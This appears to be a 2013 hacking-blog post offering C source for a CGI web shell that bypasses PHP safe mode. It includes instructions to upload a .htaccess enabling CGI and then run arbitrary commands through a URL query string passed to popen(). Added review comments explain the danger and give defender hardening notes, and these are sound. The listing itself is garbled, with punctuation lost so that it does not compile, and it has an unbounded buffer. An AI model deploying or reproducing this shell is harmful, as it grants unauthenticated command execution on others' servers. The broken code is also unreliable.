Hackers2DevNull


Saturday 18 May 2013

CGI-C Shell - PHP disabled functions/Safe Mode Bypass Shell source [Windows/Linux]




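When PHP Safe mode is on (or functions are disabled), it can be a pain to do what you want to do on the system. Those restrictions only apply inside the PHP interpreter, so being able to access CGI solves this problem, and here is my implementation of a shell (safe mode bypass) in C for Windows and Linux. For anyone hardening a host, this is why safe mode and disabled functions are not a boundary on their own: a directory that is both writable and allowed to turn on CGI execution through .htaccess undoes them.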


// (If you find this useful, why not check out an advert below to support the blog? :O ) ~r0ng






The code:



#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>


//CGI-C Shell - Safe mode bypass ~ r0ng ~ hackers2devnull.blogspot.co.uk
//Upload a .htaccess file with:
//  Options +ExecCGI
//  AddHandler cgi-script cgi
//Then usage is target.com/shell.cgi?[command]
//Compatible with Windows and linux
 


/*
 * NOTE(review): this listing lost punctuation when the page was extracted
 * ("(", "=" and "," are missing in several places, e.g. `mainvoid`,
 * `popenenv"r"`), so it does not compile as printed. The comments below
 * describe what the visible calls do.
 *
 * CGI entry point. Takes the QUERY_STRING environment variable, passes it
 * through urlStrip(), prints a Content-type header, then hands the string to
 * _popen() (Windows branch) or popen() (all other platforms) in "r" mode and
 * prints the pipe's output one fgets() chunk at a time, each chunk prefixed
 * with "<pre>".
 *
 * Security-relevant behaviour: the request's query string is used as the
 * command line with no authentication, allow-list or filtering visible here,
 * so any client that can reach the URL gets command execution with whatever
 * privileges the CGI process has.
 *
 * Defender notes: the precondition described in the file header is a
 * directory where an uploaded .htaccess may set `Options +ExecCGI` and
 * `AddHandler cgi-script`. Restricting AllowOverride, keeping upload
 * directories non-executable, and alerting on web-server CGI processes that
 * spawn a command interpreter all address this pattern. New .htaccess or
 * .cgi files under the document root are worth treating as indicators.
 *
 * Other things visible in the listing: urlStrip() is called before any
 * declaration of it; neither the getenv() result nor the popen() result is
 * checked before use; no pclose() and no return statement appear.
 */
int mainvoid )

{

    
/* Request-controlled input: the raw query string from the CGI environment. */
char *env getenv("QUERY_STRING");


    
/* Line buffer for the command output read back from the pipe. */
char pStream[128];


    
FILE  *pPipe;


    
/* Percent-decode the query string (see urlStrip) before it is used. */
urlStrip(env);

    
printf("Content-type: text/html\n\n\n");



    
/* Command-execution sink: the decoded query string is the command line. */
#if defined (WIN32) || defined (_WIN32) || defined (__WIN32__) || defined (__NT__) || defined (WIN64) || defined (_WIN64) || defined (__WIN64__)


    
pPipe _popenenv"r" );


    
#else


    
pPipe popenenv"r" );


    
#endif



    
/* Relay the command's output into the HTTP response body. */
while( !feofpPipe ) )


    {
      
        if( 
fgetspStream128pPipe ) != NULL )

        
printf"<pre>%s"pStream );
     
    }


}
/*
 * NOTE(review): extraction dropped "=", "," and part of the for-header in
 * this function as well (`char *ptr url`, `memset(url0sizeof(url))`,
 * `i=0strlen(str)`, `+= 2`, `strcpy(strurl)`), so it does not compile as
 * printed. The description follows the visible statements.
 *
 * Percent-decoder for the query string. Builds the decoded text in a local
 * scratch buffer of BUFSIZ bytes and then strcpy()s it, presumably back
 * over str (the separating comma is missing in the listing). Always
 * returns 0.
 *
 * Per character: anything other than '%' is copied unchanged. A '%' is
 * decoded only when both of the next two characters pass isdigit(), and
 * otherwise the '%' itself is copied through. The decoded byte is
 * ((c1 - '0') << 4) | (c2 - '0').
 *
 * Memory safety: nothing visible bounds the writes through ptr against
 * sizeof(url), so input of BUFSIZ bytes or more would write past the
 * scratch buffer. str is passed to strlen() with no NULL check.
 */
int urlStrip(char *str)

{

    
unsigned int i;

    
/* Scratch buffer for the decoded output; ptr is the write cursor into it. */
char url[BUFSIZ];

    
char *ptr url;

    
memset(url0sizeof(url));



    for (
i=0strlen(str); i++)

    {

        /* Ordinary character: copy as-is. */
        if (
str[i] != '%')

        {

            *
ptr++ = str[i];

            continue;

        }



        /* '%' not followed by two isdigit() characters: keep the '%' literally. */
        if (!
isdigit(str[i+1]) || !isdigit(str[i+2]))

        {

            *
ptr++ = str[i];

            continue;

        }



        /* Combine the two digits into one byte (high nibble, low nibble). */
        *
ptr++ = ((str[i+1] - '0') << 4) | (str[i+2] - '0');

        
/* Presumably `i += 2;` to skip the two consumed digits (identifier lost in extraction). */
+= 2;

    }

    *
ptr '\0';

    
/* Unbounded copy of the decoded text, presumably back into the caller's buffer. */
strcpy(strurl);

    return 
0
;}
